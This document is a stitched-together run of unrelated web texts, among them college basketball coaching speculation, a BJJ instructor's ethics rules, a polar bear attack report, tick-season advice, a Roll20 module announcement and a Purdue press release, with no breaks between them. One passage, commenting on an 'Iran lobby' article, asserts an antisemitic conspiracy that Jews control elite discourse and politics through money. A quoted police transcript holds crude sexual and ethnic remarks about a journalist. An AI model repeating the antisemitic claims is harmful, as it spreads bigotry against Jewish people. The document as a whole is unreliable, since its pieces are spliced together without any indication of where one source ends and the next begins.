Saul Phillips, Ohio head coach. Phillips, 41, gained a lot of traction after leading North Dakota State to 26 wins and a Round of 64 upset of Oklahoma in the NCAA tournament. Alvarez wasn't afraid to hire a lesser-known candidate to run his football program -- tapping Utah State's Gary Andersen in December 2012 -- and he might do the same for the basketball program whenever Ryan departs. Phillips, though, is no stranger in Madison or to Ryan. He played for Ryan at Wisconsin-Platteville and then served as director of basketball operations under him with the Badgers from 2001-04 before going on to coach at North Dakota State as an assistant. Now he's at Ohio, where he'll have to continue the upward trajectory – but it is the correct trajectory.
Brian Wardle, Wisconsin-Green Bay coach. Wardle is 71-55 at Green Bay and had a 24-win team poised to be an NCAA tournament sleeper last season before injuries derailed the Phoenix's Horizon League tournament run and sent them to the NIT. He might belong in the group above, but big-name candidates like Bennett and entrenched options like Gard would have to fall out of favor before Wardle got a call. And how much would Wisconsin welcome a coach with a heavy Marquette background? Wardle, 34, was a star for the Golden Eagles and coached there as an assistant before going to Green Bay.
Gary Close, Wisconsin assistant coach. Close doesn't go quite as far back with Ryan as Gard does, having joined the Badgers staff in 2003 after stops at Iowa and Stanford, and thus appears to be one position behind him in Madison. At 57, Close certainly is seasoned enough with a strong enough track record as an offensive guru – he is credited with coaching the mechanics that led to the five most prolific three-point shooting seasons in Wisconsin history – to run a team.
Rob Jeter, Wisconsin-Milwaukee head coach. The 45-year-old Jeter has had a mercurial nine seasons with the Panthers. He's posted four seasons of 20-plus wins, including a 21-14 season in 2013-14 and a surprise bid into the NCAA tournament via the Horizon League tournament title. But there have been significant dips, too, like a 9-22 record in his second season and an 8-24 mark just two years ago. And his program also suffered APR penalties, resulting in a postseason ban for 2015. Jeter does have one significant plus: He was Ryan's assistant coach and lead recruiter at Wisconsin from 2001-05. The question is whether the minuses would dim his candidacy.
James Whitford, Ball State head coach. This would be an extremely long-term play, with Whitford having presided over a 5-25 first season on the sideline with a very young Cardinals team in 2013-14. (Ball State had four freshmen playing major roles.) But he's a Madison native and a 1994 Wisconsin graduate, and he served as a manager on the basketball team for three seasons. He has a solid coaching pedigree, too, as a longtime aide to Arizona coach Sean Miller; Whitford was Miller's associate head coach in Tucson before taking over at Ball State. Turning around that program could turn heads at his alma mater, but Whitford has to make that happen first.
Pat Miller, Wisconsin-Whitewater head coach. Would Alvarez attempt to test the lightning-strikes-twice theory? Miller is 291-83 in 13 years as a head coach, and he was named the Division III coach of the year by the NABC this past season after leading Whitewater to the national title. Miller is certainly tough enough: He underwent surgery to relieve pressure on his spine in February -- and returned to the bench two weeks later. It's a long, long shot, and even Ryan had to put in those two years at the Division I level before getting the call from Wisconsin, but Miller is an intriguing candidate.
My last post about my rules as an instructor was well received, but many of you asked for more of my ethical and moral rules, not just ones related to how I teach techniques or run warm-ups.
Treat all students equally.
Every student deserves equally opportunities for an instructor's time and guidance.
In reality, some students will need more attention than others, but I make an effort to spend time with every student in my class and be available to help them if needed.
The point is to not play favorites or allow cliques to form. Even the clumsiest, bumbling, most clueless white belt deserves your attention.
Show up to class and pay attention the entire time.
This rule may seem obvious to the point of stupidity, but you would be surprised (or maybe not so surprised) by how many BJJ instructors fail at it.
Have you ever showed up for a scheduled class only to stand outside of a locked gym door for 20 minutes until a frantic purple belt rushes over to open up and cover class because the head instructor cannot be found?
Have you ever had an instructor who would just show a move, then walk away to check his phone or chat on the side with a clique of higher belts?
These are common occurrences in the BJJ world, but they should not be. If I cannot get to class, I make sure it is covered or I make sure the students get enough warning to change their plans. Nothing is worse than getting ready to train and driving all the way to the gym just to turn around and drive home. That cannot happen as long as people are paying to train at your school.
Do not get into relationships with students.
In my previous post, I briefly mentioned “don't bang your students” as an obvious rule, but many readers wanted to hear more on that, which is partly why we are getting this second post.
Let's look to what the code of ethics for Olympic coaches says about this:
Coaches do not engage in sexual intimacies with current athletes.
The code even goes one step further to ban sexual relations between coaches and former athletes for two years after the coach-athlete relationship ends, explaining it like this:
Because sexual intimacies with a former athlete are so frequently harmful to the athlete, and because such intimacies undermine public confidence in the coaching profession and thereby deter the public's use of needed services, coaches do not engage in sexual intimacies with former athletes even after a two-year interval except in the most unusual circumstances.The coach who engages in such activity after the two years following cessation or termination of the coach-athlete relationship bears the burden of demonstrating that there has been no exploitation, in light of all relevant factors, including:
(1) the amount of time that has passed since the coach-athlete relationship terminated,
(2) the circumstances of termination,
(3) the athlete's personal history.
(4) the athlete's current mental status,
(5) the likelihood of adverse impact on the athlete and others, and
(6) any statements or actions made by the coach during the course of the athlete-coach relationship suggesting or inviting the possibility of a post-termination sexual or romantic relationship with the athlete or coach.
A BJJ gym is not held to the same standard as an Olympic training center, but it is still a bad idea for instructors to sleep with students for the same reasons. The teacher-student dynamic -- like any with one person having more authority, control, and influence over the other -- has too much potential for abuse. Students (especially women) should not need to worry that their coach has other intentions than to teach them what they signed up to learn.
I will admit I know of a few times where a BJJ black belt dated a student and they ended up happily married, but I have many more stories about nasty break-ups, rifts breaking up the gym, jealousy, angry wives, and all the drama you would expect from a Brazilian soap opera. It's better to just keep it in your pants.
Prepare your students for the physical demands you will place on them.
This is a newer rule for me, but one I wish was more common as I was coming up the ranks. As I said in my other post, I do not turn my BJJ classes into strength and conditioning workouts, and I am not a fan of long warm-ups, but I have come to believe it is an BJJ instructor's duty to prepare students (especially beginners) to handle the positions and stresses we will put them through. To do otherwise is to set them up for injuries and chronic pain. My training in Functional Range Conditioning has driven this point home, and now I feel that I have the tools to do the right movement prep without turning warm-ups into touch butt.
Share everything you know and keep no secrets.
Just as I do not believe in the old school “creonte” mindset, I do not believe in keeping “secret techniques” from my students. Nevermind that it is nearly impossible to have a true secret technique these days, because the minute it is used in tournament, it will be up on ShowtheART, reddit, and get 4000 shares on Facebook.
Keeping no secrets does not mean that you have to teach literally everything any time you are asked. Students have a limit on how much they can absorb, and they need to learn the basics before you show them advanced techniques. You can still tell a student “I would show you that but I don't think it's the most important thing for you to learn right now. Here's something better.” The point is that you do not place “tests of loyalty” or other nonsense between your students and what you are willing to show them.
Keep politics and drama off the mats.
Do not abuse the fact your students have to listen to you to preach to them beyond your beliefs about BJJ. Religion, politics, and gossip are best kept off the mats. (That's what Facebook is for.)
Be direct with your students if there is a problem.
That stinky white belt with claws for nails and funk growing behind his ears? The girl who did not realize she had her period in her white gi pants? The creepy new guy who keeps trying to slink over to partner up with the girls? The newly minted blue belt who tries to run mini-seminars for the white belts when everyone else is rolling? Those are all your problems as an instructor. Those will require an awkward conversation to handle, but you just need to step up and do it -- being as tactful as possible, of course.
Remember, being a black belt does not make you a better person.
Being a better person makes you a better person. Maybe BJJ helps you do that, or maybe it doesn't. I have known my fair share of crappy people who happen to be good at BJJ.
We like to do this weird thing where we wear cotton pajamas styled after feudal Japanese clothing and throw each other around on rubber padding. We give each other colored strips of fabric to wrap around our waists so we can show how good we are at this odd activity. We make up hashtags like #jiujitsulifestyle and #bjjsavedmylife and we post on reddit about how our boyfriends and girlfriends just don't get us.
These are all fun to do but they do not make you a good person. They just make you a person with an unusual hobby.
Here are things that make you a good person:
Loving and caring for your family and friends
Treating people with fairness
Showing kindness and compassion
Helping a stranger in need
Things that do not make you a better person:
Being good at armbars
Having a strong sprawl
Throwing people on their heads
Lower belts bowing to you
I am not saying this to diminish the positive changes many people experiences through doing BJJ. Anything that requires dedication, commitment and social interaction with others can lead to personal growth. The point I am making is: you need to stay humble. Between me as a BJJ black belt and a white belt who is a plumber, society needs him far more than it needs me.
---
Does that code of ethics square with what you believe? Would you add to the list? Let me know in the comments below.
Phase Change Material Could Cool Houses
MIT's Technology Review reports on paraffin wax capsules could use the cold of evening to cool rooms in the day.
Building materials that absorb heat during the day and release it at night, eliminating the need for air-conditioning in some climates, will soon be on the market in the United States. The North Carolina company National Gypsum is testing drywall sheets--the plaster panels that make up the walls in most new buildings--containing capsules that absorb heat to passively cool a building. The capsules, made by chemical giant BASF, can be incorporated into a range of construction materials and are already found in some products in Europe.
This won't help much so much where the difference in day and night temperatures is small. But desert areas get very cool at night. So this approach would work well for these areas. What I wonder: Does the paraffin increase the flammability of the walls in a fire?
One could also use a similar approach to make use of lower night rates for electricity. Run an air conditioner or ground sink heat pump at night and use it to cool a compound from liquid to solid phase at night. Then blow home air over the solid during the day to cool it.
Pricing of electricity by time of day and even by level of demand would provide more incentive to implement storage systems for heat and cool. Changes in utility regulatory policies to change electricity pricing based on supply and demand would encourage greater use of materials for storing cool and heat.
NEW DELHI: The Budget Session of Parliament has been one of the most productive sessions in its history, Union Minister Ananth Kumar said today, adding that as many as 18 bills were passed by both the houses during the session.The productivity of Lok Sabha during the Budget Session was 114 per cent while that of Rajya Sabha was 92 per cent. As many as 23 bills were passed in the Lower House and 14 legislations in the Upper House, the Parliamentary Affairs Minister said.While in both houses 18 bills were passed, he said.The major highlight of the session was the passage of four Goods and Services Tax ( GST ) bills to enable the implementation of the new indirect tax regime from July 1, he said."I think this was one of the most productive budget sessions and it will go down as the golden chapter in the Parliament's history," Kumar told reporters here.It is for the first time in the Indian legislative history that all financial business of government, including passage of finance bill and demand for grants and appropriation bill , was completed before the start of next fiscal, he said.Besides, some other important legislations including Maternity Benefit (Amendment) bill, Enemy Property bill and Mental Health Care bill were passed by both the houses.The Budget Session started from January 31 and came to a close today.
Greetings D&D fans, we are pleased to announce…
Storm King's Thunder is available to play right now in Roll20!
That's right folks, we've been approved for an early launch of the newest adventure from Dungeons & Dragons, so if you've been itching to check out this incredible new module you can jump in and play right now!
Storm King's Thunder - The Story So Far…
Hill giants are stealing all the grain and livestock they can while stone giants have been scouring settlements that have been around forever. Fire giants are press-ganging the smallfolk into the desert, while frost giant longships have been pillaging along the Sword Coast. Even the elusive cloud giants have been witnessed, their wondrous floating cities appearing above Waterdeep and Baldur's Gate. Where is the storm giant King Hekaton, who is tasked with keeping order among the giants?
Roll20's Module Team has spent over 250 hours prepping this incredibly modular and expansive new adventure, adapting it perfectly for play in Roll20.
Within this module you will find…
Over 40 battle-ready maps
Grid and scale setup
Tokens in place
Dynamic Lighting setup on all maps that would benefit from this feature
Over 200 statted tokens
All NPC Characters setup, statted, linked, and assigned to their tokens
SRD5 Compendium & 5th Edition OGL by Roll20 Sheet compatible
Cross-linked handouts to help you throughout the adventure
Including Handouts for all adventures, magic items, locations, and more
All Access Vault Unlocked for all users
For games you create, you and your players can export characters from the Vault into the game, no subscription required
Original Artwork
All of the original artwork created by Dungeons & Dragons and found in the Storm King's Thunder physical book can be found within the Roll20 module.
Of note: a subscription to Roll20 is NOT required to play this module. Any features associated with a subscription level setup in game, like Dynamic Lighting, will simply be unavailable unless you are a sub.
There were several generic animals featured in the story that did not have physical representations within the book. In order to best adapt Storm Kings's Thunder for Roll20, we have obtained art to represent these generic creatures from Brass Badger Workshop.
If you pre-ordered your copy of Storm King's Thunder via Roll20, then this module is already available to you from the Start New Game page on the site, just click the Storm King's Thunder banner to begin.
A grand story full of replayable adventures, Storm King's Thunder is sure to take your party through some of the largest 5th Edition D&D battles to date.
We're thrilled to offer Storm King's Thunder on the Roll20 platform, to empower Dungeon Masters to launch their parties into adventure faster than ever before!
Pick up your copy today from the Roll20 Marketplace, enjoy!
-Stephanie
This is my intro for Dead of Winter. I thought it may spark an interesting discussion about what I call Peak Zombie:
I think I was a freshman or sophomore in high school the first time I saw Dawn of the Dead. It hit me the way certain things can only hit a child's fragile, eggshell mind: it was gory, and disturbing, and pretty scary. It also made me wonder what I would do if I found myself in the zombie apocalypse. Would it really be living if I spent the rest of my life trapped inside a mall? At what point does surviving cease to be living? Why am I asking myself incredibly complex and difficult philosophical questions, instead of playing The Legend of Zelda?
Dawn of the Dead piqued my interest in George A. Romero's version of the zombie apocalypse, and I devoured — sorry — Night of the Living Dead, Day of the Dead, and even Return of the Living Dead. For many years, I was a zombie fiend. In fact, every Halloween from 16 to 30, I was some version of a zombie. I wrote stories about zombies, I read stories about zombies, and if there was something with a zombie in it, it was on my wish list.
But sometime in the last few years, we hit Peak Zombie, and the truth is: I'm kind of over it. The Living Dead are rarely a metaphor for consumerism, conformity, militarization, and complacency. In much of popular culture, zombies are little more than cannon fodder and background noise in corporate entertainment that's rushed to cash in on the public's insatiable — some may say zombie-like — hunger for stories that pit a scrappy band of human survivors against a relentless, endless, faceless mob of interchangeable, shambling bad guys.
But every now and then, something breaks through the fortified wall of hardened, Hipster cynicism I've built around my survival compound, and reminds me that we keep returning to stories where zombies are threatening our very existence because even if the undead aren't explicitly standing in for some profound and specific commentary on our modern world, they can, in fact, stand in for time, age, hunger, despair, and every existential threat we worry about when the night is darkest, and we can't find the light.
Today on Tabletop, Dodger Leigh, Grant Imahara, and Ashley Johnson are here to explore a game that puts us right in the middle of the depths of our fears, during the worst of the zombie apocalypse. As if staying alive and pushing back the undead wasn't hard enough, one of us may very well be working against the rest of us, to ensure that none of us make it through the DEAD OF WINTER.
“A crushing head blow is a lethal injury for seals”
By SPECIAL TO NUNATSIAQ NEWS
JUSTIN NOBEL
It happened 11 years ago outside Kimmirut, six years ago in Ivujivik and just last December in Igloolik.
This past July it happened again in Nunavik: a polar bear nearly tore someone's head off.
Alice Annanack and her husband, Tommy Baron, were camping near Kangiqsualujjuaq in late July when a young polar bear jumped on Annanack's back and bit through the top of her head.
The bear slashed open her scalp and came just millimetres away from piercing her skull and entering her brain.
“When I turned around there was a polar bear,” said Annanack, from her hospital bed at the Montreal General Hospital, in a video posted on the Montreal Gazette website. “He only had to walk two steps to reach me, that's how close he was.”
“My husband couldn't shoot the bear when he wanted because the polar bear's head was always around my head,” added Annanack.
Eventually, Baron managed to fire a shot into the bear's hind leg, causing the animal to release his wife. He then shot the polar bear in the head and killed it.
As shocking as this story is, it's a familiar one in the North, where every few years there seems to be an incident of someone narrowly surviving a polar bear attack.
In Igloolik last December, a group of hunters looking for their cache of aged walrus meat were attacked by a polar bear with cubs.
The scene could have ended badly for the men but 58-year-old John Arnatsiaq shoved a hammer in the mother bear's mouth, giving another member of the group time to shoot the menacing bears.
There is the famous 2006 story from Ivujivik, when tiny Lydia Angyiou tackled a polar bear that was threatening her son and his two friends playing hockey outside the community's youth center.
And in July 1999, a polar mauled an elderly woman to death at a camp near Baker Lake. Her grandson received severe lacerations to his head and face but survived.
Attacks are not limited to Nunavut and Nunavik. Gruesome pictures from a 2006 polar bear attack in the Yukon show a man's scalp split apart like an opened book.
Why do polar bears always go for the head?
“A crushing head blow is a lethal injury for seals,” said Geoff York, a polar bear expert with the World Wildlife Fund. “But seals have fairly thin skulls that are easy to crush. Fortunately, ours are a bit thicker.”
Despite these ferocious attacks, polar bears aren't nearly as aggressive as other bears, said York. “There are far more attacks and far more attacks with significant human negative outcomes with brown and black bears than there are with polar bears,” he explained.
Brown and black bears in North America typically kill a handful of people each year, while in the United States there has only been one polar bear death in the last 100 years, said York.
Part of the reason is brown and black bears are more territorial than polar bears, which live on shifting ice floes that are always moving and changing, explained York.
Brown and black bears also show up on popular trails and in suburban backyards, where people are not as accustomed to dealing with large predatory animals.
But York worries that with more people headed to the Arctic for mining and tourism, polar bear attacks could be on the rise across Nunavut. “There will be more people,” said York, “and they will be less knowledgeable.”
In the summer of 2001, four tourists from Quebec were attacked by a polar bear while camping in Katannilik Territorial Park outside Kimmirut.
But these were medical professionals with significant outdoor experience.
One man jabbed a tiny knife, just 10 centimetres long, into the bear's neck. Even though one of their group nearly had his jugular severed by the bear, all four were able to canoe back to Kimmirut for help.
Not all polar bear stories end so well. Last year, on the island of Svalbard, off the coast of Norway, a group of British teenagers on a camping trip were attacked by a polar bear.
It grabbed one by his head and killed another before a guide could finally get a shot off and kill the bear. The tour company was later criticized for their negligence: the explosive trip wire meant to warn people of bears failed and there was no night watchman on duty.
Another pressing question is whether climate change and reduced sea ice conditions in the Arctic are causing polar bears to attack more.
York explained that less ice does not mean a wave of hungry bears will be coming ashore, but there will be more incidents of hungry bears wandering around communities.
“There is every reason to believe given what's happening with sea ice in the summertime that we're likely to see more polar bears showing up around human settlements and for longer periods of time,” said York.
With more tourists headed to the Arctic this could pose a problem, but there is a bright side.
“You have this well of traditional knowledge on polar bear behavior that people can draw on,” said York.
“Tour operators should be looking to communities to make sure their tour guides have discussions with hunters prior to starting up their tour season. Or better yet, they should hire local hunters to be their tour guides.”
When summer rolls around, grills are fired up. The smoky smell of charred meat can waft throughout my neighborhood on any given summer evening, and everyone seems to have their own special method for barbecuing the perfect ribs and more. But as Sweet Baby Ray's puts it, the sauce is the boss, and there's no shortage of barbecue sauce varieties at the local supermarket. Here are 10 of my favorite barbecue sauce label designs, served up for your inspiration.
This simple design highlights the company's awards and lends a down-home Southern charm to its sauce. Authenticity is paramount for a gourmet barbecue sauce, and this label design does a great job of making you feel as though the sauce came straight from Ray's kitchen.
Another label designed for authenticity, the goal of the designer was to ingrain its Texas roots into a striking design that stands out from the competition.
An entire line of branded barbecue products, each with a distinctive design style that makes it feel decidedly Old West – or right off the Conestoga wagon.
This was sold as a promotional piece for the BC Lions team in 2011. I love the use of the peeled orange as a “Q” and the contrast of the team-branded orange typography against the charcoal background.
This is a student-designed packaging concept for barbecue sauces geared toward campers. The idea is that different campers like different sauces, so they can be placed in smaller, camping-themed packages so multiple sauces can be enjoyed at each meal.
These labels were designed for the Pig of the Month mail-order barbecue sauce company. Each features a fun theme that matches its witty copy.
Illustrated and personified barnyard animals make these barbecue sauce label designs unique and attention getting.
I love the logo (the pig silhouette on a flame), which makes this an instantly understood and recognizable brand. The sauce was created by Jamie and Bobby Deen, sons of TV personality Paula Deen.
Danny D's barbecue sauce label design is modern and fun, yet old-school and genuine. It's the perfect meld of a composite style that's just different enough to get noticed.
An ultra-modern barbecue sauce label that includes an easily branded bee character. What's your favorite barbecue sauce label design? Share it in the comments!
Farnam: My wife worked at the Herald. She fucking hated that bitch.
Second, unidentified police officer: She hot?
Farnam: Not hot. I mean, she's got an OK body. I mean…
Unidentified 1: Giant boobs.
Farnam: Fucking giant, dude. I mean, not like quadruple Ds or anything. But at least a solid set of Ds, probably double Ds.
Unidentified 1: You know what? It's that UK fish and chips. UK women have big tits. It's how they're — how they're grown over there. I don't know why.
Second Unidentified Officer: She is, uh…
Undentified 1: Why do they have fucked up teeth? I dunno, but it happens.
Farnam: I didn't look at her teeth. But she doesn't have like a real pretty face at all.
Undentified 1: She's from the UK. She's got huge tits.
Farnam: Yeah, and her skirt was like seven and a half inches long. And just.. extremely pale white. But, you know…
Unidentified 1: She's a limey. A UK thing again. She literally grew up on a fucking island that's always cloudy.
Unidentified 2: I don't know why you have to be so hard on her.
New York City Mayor Bill de Blasio, center, and New York Police Commissioner Bill Bratton, right, listen at a news conference in New York on Jan. 5, 2015.
A spokesman for New York Mayor Bill de Blasio said Tuesday that the leader would veto a city bill making police chokeholds illegal were the legislation to reach his desk.
The statement came a day after the newly created Office of the Inspector General found that the New York City Police Department's disciplinary procedures failed to bring about serious consequences for 10 officers accused of using the controversial maneuver.
Chokeholds came into the national spotlight last summer after Staten Island resident Eric Garner was killed during a botched arrest in which an NYPD officer used a chokehold. A grand jury later cleared the officer who killed Garner of all wrongdoing, spawning widespread protests.
Though chokeholds are currently forbidden by the NYPD's internal regulations, there are no city laws forbidding officers from using them.
Late last year, Queens Councilman Rory Lancman introduced a bill that would make chokeholds illegal under city law, imposing up to a year in prison for law enforcement officers who use chokeholds during an arrest, Gothamist reported. At the time, de Blasio also said he would veto the bill, which has yet to be passed by the city council.
"I think the best way to handle that is through NYPD policy," the mayor said in November. "I don't think it should be made a matter of legal prohibition."
Shortly after Garner's death, the Office of the Inspector General — an agency created by de Blasio to oversee the NYPD — launched an investigation into how the police department investigates cases in which officers are accused of using chokeholds.
The inspector general's report, published on Monday, found that none of 10 recent cases in which civilians made substantiated chokehold complaints resulted in serious disciplinary actions for the accused officers.
In an email to BuzzFeed News on Tuesday, de Blasio's spokesman, Phil Walzak, reiterated the mayor's position.
"As it is consistent with his previously stated views on this issue, the mayor would veto the chokehold bill as it is currently drafted were it to reach his desk," Walzak said.
Walzak did not answer questions about whether the inspector general's report changed the mayor's thinking on the subject.
For his part, Lancman expressed confidence that he would be able to change the mayor's mind during legislative hearings.
"The legislative process has barely started yet," Lancman, the current bill's sponsor, told BuzzFeed News. "We have not yet had a chance to explain to the mayor why his concerns might not be justified or suggest ways that we can get him a bill that he can support."
Beware hikers, turkey hunters, and other brush-country and wilderness travelers: Black-legged tick season is here, and the tiny bloodsuckers are looking for a host.
“It's that time of year,” said Dave Neitzel, supervisor of the vectorborne disease unit at the Minnesota Department of Health in St. Paul. “The bottom line is this: If you're in a woodsy, brushy area, you're at risk.”
And maybe never more so: Minnesota has seen a dramatic increase in the number of counties reporting established tick populations.
Commonly referred to as deer ticks, black-legged ticks might be tiny, but they pack a significant bite. They carry and transmit Lyme disease, which manifests with several symptoms from extreme fatigue to fever to muscle aches. Transmission of Lyme disease, which has no vaccination and is treated with antibiotics, is often marked at the spot of the bite with a small bull's-eye rash. Protecting public health, Neitzel said, hinges on minimizing encounters with infected ticks. “Minnesotans are active and like to get out in the woods, especially in spring after a long winter,” he said. “But precautions need to be taken.”
More than 300,000 people are diagnosed with Lyme disease each year in the United States, a number that has increased steadily since the tick-borne illness was discovered in the 1970s. That's because black-legged tick infestations across the country, including Minnesota, have spiked in recent years. In 2015, for example, 45 of Minnesota's 87 counties reported established black-legged tick populations (a previous study from 1996 showed only nine).
A recently released federal study by the Centers of Disease Control and Prevention (CDC) compared tick infestations data tallied in 1996 and 2015. Last year across the nation, black-legged ticks were documented in 1,531, or 49 percent, of counties in 43 states. In the 1996 study, 1,058 counties in 41 states reported the presence of deer ticks.
As deer tick populations have spread, Neitzel said, incidences of Lyme disease have increased. In Minnesota, the median number of Lyme disease cases each year from 1996 to 2005 was 464, according to the Minnesota Department of Health. From 2006 to 2014, the median rose to 1,065. Lyme disease information for 2015 is not yet available.
“Lyme disease cases can fluctuate from year to year based on weather conditions,” said Neitzel. “When it's drier, deer ticks are less active. In warmer years with more humidity, ticks are more active and looking for hosts.”
What's the best way to prevent deer-tick exposure? Neitzel said there are three factors for outdoor travelers to consider and understand:
The “when” part
Black-legged ticks have three life-cycle stages: larva, nymph and adult. Neitzel said they're most active during the nymph, or immature, stage, which runs from about mid-May to mid-July. “That's the highest-risk time of year,” said Neitzel, adding that adult ticks are active now and can transmit Lyme disease.”
People can start to show Lyme disease symptoms during any month of the year. However, mid-May through mid-July is when most people are bitten and infected by ticks. The rest are infected in early spring and in the fall when the adult ticks are most prevalent. A deer tick nymph is about the size of a poppy seed — difficult to detect. “They're very hard to spot, that's for sure,” Neitzel said.
The “where” part
Neitzel said black-legged ticks live in wooded, brushy areas that provide food and cover for white-footed mice, deer and other mammals. Such habitat provides the humidity deer ticks need to survive and thrive. “This is the heart of risk area,” said Neitzel. The ticks search for hosts from the tips of low-lying vegetation and shrubs, not from trees. “Deer ticks don't jump or fly — they typically grab onto people when they brush against vegetation and then crawl up to find a place to bite,” said Neitzel. “That's why I tell people when they're hiking to stay in the middle of the trail. That will decrease your risk to exposure.”
The “final” part
If you're working or playing in tick-infested areas, Neitzel said take precautions. Use a “good” repellent on skin and clothing.
Neitzel recommended DEET-based products containing no more than 30 percent DEET, the most common active ingredient in insect repellent. Do not use DEET on infants under 2 months. Products containing permethrin, which are used on clothing and should not be applied to skin, are especially recommended for people who spend a lot of time in tick habitat. “Permethrin lasts a long time and kills ticks on the treated surface,” Neitzel said. He said to follow label instructions for each repellent to the letter. To detect ticks more easily and reduce exposure, Neitzel said to wear light-colored, long-sleeved shirts and long pants. “You can create a tick barrier by tucking your pants into the top of your socks or boots,” he said. “Deer ticks are very good at finding exposed skin. They don't have eyes, but they do have great sensory organs.”
Lastly, if you find an embedded deer tick, remove it immediately, Neitzel said. If possible, use a pair of tweezers to grasp the tick's head close to the skin. Pull the tick outward slowly, gently and steadily. Apply antiseptic on the bite. See a doctor if you've been bit or exhibit systems of Lyme disease.
“You can never be too careful,” Neitzel said.
Tori J. McCormick is a freelance writer living in Prior Lake. Reach him at torimccormick33@gmail.com.
Muzaffarnagar: Three men arrested in June for allegedly slaughtering cows have been booked under the National Security Act (NSA), a senior district official said on Wednesday.
According to District Magistrate GS Priyadarshi, Khalil, Bhura and Inam Qureshi were booked under NSA on the recommendation of the local police on Tuesday evening.
They were arrested on 24 June for allegedly slaughtering cows in Katka village under Jansath police station in the district and one quintal of beef was seized from their possession, he said.
The accused have been in jail since then, added Circle Officer SKS Pratap.
State Director General of Police (DGP) Sulkhan Singh had issued a directive in June to all district police chiefs to book those involved in cow slaughter and illegal transport of milch animals for slaughter under the stringent NSA and Gangsters Act in Uttar Pradesh.
"NSA and Gangsters Act is to be invoked against those involved in cow slaughter and trafficking of milch animals for slaughter," the DGP's order said.
Firstpost is now on WhatsApp. For the latest analysis, commentary and news updates, sign up for our WhatsApp services. Just go to Firstpost.com/Whatsapp and hit the Subscribe button.
“The Bomb Iran Lobby Gears Up for 2016: A tight-knit group of neocon dead-enders is pushing Iran to the forefront of the GOP's foreign policy agenda“ by Sina Toosi; Foreign Policy in Focus
Hardline Senators Together these groups have established what amounts to their own echo chamber. They've built an anti-Iran communications and lobbying infrastructure that enjoys substantial influence in Washington's corridors of power, particularly in Congress.
And if you think that this has nothing to do with Jewish money aimed at furthering Israeli interests, you are simply avoiding reality. It's very difficult to see how a Republican candidate could win the nomination without the support of the Republican Jewish coalition. It's yet another example where Jews pursue a top-down strategy that begins by dominating elite discourse, shaping public opinion by having access to the elite media, and by the role of money in influencing politics at the highest level. Of course, many non-Jews are involved in this movement, from well-paid foreign policy hacks who work at the think tanks mentioned, Senators (Toossi mentions Tom Cotton, Lindsey Graham, Mark Kirk, Kelly Ayotte, and John McCain), to presidential candidates. As Lindsey Graham famously said,
“If I put together a finance team that will make me financially competitive enough to stay in this thing…I may have the first all-Jewish cabinet in America because of the pro-Israel funding. [Chuckles.] Bottom line is, I've got a lot of support from the pro-Israel funding.”
It's not just Republicans who are in fealty to Jewish pro-Israel money. Hilary Clinton, who seems to be the inevitable Democratic candidate despite being little more than a grifter, depends on Haim Saban and the liberal Jewish establishment ensconced in Hollywood. Saban is totally on board with bombing Iran. Clinton also has close ties to Wall St. and has welcomed important neocons like Robert Kagan to her foreign policy team. War with Iran in 2017 seems almost a foregone conclusion.
Toossi's entire article is well worth reading. He concludes:
WEST LAFAYETTE, Ind. — Purdue University is listed in the Princeton Review's 200 best value colleges for 2016, according to information released Tuesday (Feb. 2).
The Princeton Review, an education services company, developed a "Return-on-Education" (ROE) rating to compile its list of the 200 colleges for its book, "Colleges That Pay You Back: The 200 Schools That Give You the Best Bang for Your Tuition Buck."
According to the company, the listing is based on an analysis of 40 data points, including academics, cost, financial aid, and student debt, statistics on graduation rates, alumni salaries and job satisfaction. Data was collected in 2014-15 in surveys of administrators and students at 650 colleges, plus surveys of alumni conducted by PayScale.com through April 2015. The Princeton Review does not rank the colleges in the book overall, 1-to-200, on a single list.
"At Purdue we prioritize affordability, accountability and quality, and we work very hard to offer 'higher education at the highest proven value,' " said Purdue President Mitch Daniels. " It's nice to be noticed, but we know we have much more to do."
In May 2015 the Purdue Board of Trustees approved a tuition freeze for the West Lafayette campus through the 2016-17 academic year. That will mark four consecutive years of no change in base tuition. At the West Lafayette campus, tuition and fees remain $10,002 for resident students and $28,804 for out-of-state students. International students enrolled in summer 2012 or after will pay $30,804.
The Princeton Review summary says, in part, that Purdue "is one of the most educationally and ethnically diverse universities in the United States. … Purdue has excellent research opportunities that are open to almost anyone who shows interest and dedication, and prides itself on being strong in STEM education, with heavy emphasis on real-world practical research and knowledge. When combined with an emphasis on innovation and creative thinking, Purdue becomes a great choice for anyone looking to have a successful future."
Other universities in the state included in the "best value" survey are (DePauw, Indiana, Notre Dame, Rose-Hulman Institute of Technology and Wabash College. In addition to Purdue and Indiana, other Big Ten universities ranked include the University of Illinois, University of Michigan, University of Minnesota, Northwestern University, Ohio State University, Pennsylvania State University, Rutgers, The State University of New Jersey and the University of Wisconsin.
Writer: Greg McClure, 765-496-9711, gmcclure@purdue.edu
Source: Mitch Daniels, president@purdue.edu
The Brazilian has been one of the standout performers for Liverpool this season with the Reds flying high under Jurgen Klopp. Coutinho shone for the German boss last term too, winning Liverpool's Player of the Year and Players' Player of the Year at the end of season awards. His displays prompted PSG to make a bid for the 24-year-old in the summer although the Reds swiftly rejected their £22.5m approach.
Jurgen Klopp's Liverpool signings ranked and rated Fri, October 7, 2016 Express Sport takes a look at Jurgen Klopp's signings in his first year as Liverpool manager Play slideshow Getty Images 1 of 9 Express Sport ranks and rates Jurgen Klopp's signings since taking over as Liverpool manager a year ago
GETTY Philippe Coutinho is reportedly attracting interest from PSG
But according to French magazine Le 10 Sport, PSG will renew their interest in January, or the summer, after regretting not buying him in the previous transfer window. Liverpool is unlikely to want to part with their star man however, who remains central to Klopp's plans in winning the Premier League title. PSG boss Unai Emery is keen to strengthen his attack and believes the midfielder would be the perfect fit.
GETTY Le 10 Sport's article on PSG's interest in Coutinho
Hide Transcript Show Transcript
